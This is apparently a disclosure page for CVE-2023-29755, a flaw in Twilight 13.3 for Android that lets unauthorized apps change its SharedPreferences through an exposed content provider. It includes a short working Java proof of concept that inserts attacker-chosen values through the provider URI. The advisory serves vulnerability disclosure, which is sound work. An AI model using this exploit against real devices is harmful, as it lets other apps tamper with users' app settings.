Headline
CVE-2023-29755: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs
An issue found in Twilight v.13.3 for Android allows unauthorized apps to cause escalation of privilege attacks by manipulating the SharedPreference files.
Escalation of Privileges exists in Twilight(CVE-2023-29755)
Vendor: Twilight(http://twilight.urbandroid.org/)
Affected product: Twilight(com.urbandroid.lux)
Version: 13.3
Download link: https://play.google.com/store/apps/details?id=com.urbandroid.lux
Description of the vulnerability for use in the CVE:An issue found in Twilight v.13.3 allows unauthorized apps to cause escalation of privilege attacks by manipulating the SharedPreference files.
Additional information: The Twilight application allows unauthorized applications to use the methods provided in its exposed components to modify data in the SharedPreference file, which is loaded at application startup and affects critical application functionality. Specifically, an attacker is able to change relevant settings in the application by modifying certain key data in the SharedPreference file, such as adjusting the screen brightness, changing the application theme, etc., resulting in an escalation of privilege attack.
poc:
ContentResolver contentResolver = getApplicationContext().getContentResolver(); Uri parse = Uri.parse(“content://com.urbandroid.sleep.multiprocesspreferences.PREFFERENCE_AUTHORITY/a/a”); ContentValues contentValues = new ContentValues(); //attacker can update any data in sharedpreferences! contentValues.put(targetKey,targetValue); contentResolver.insert(parse,contentValues); System.out.println(“输入数据”);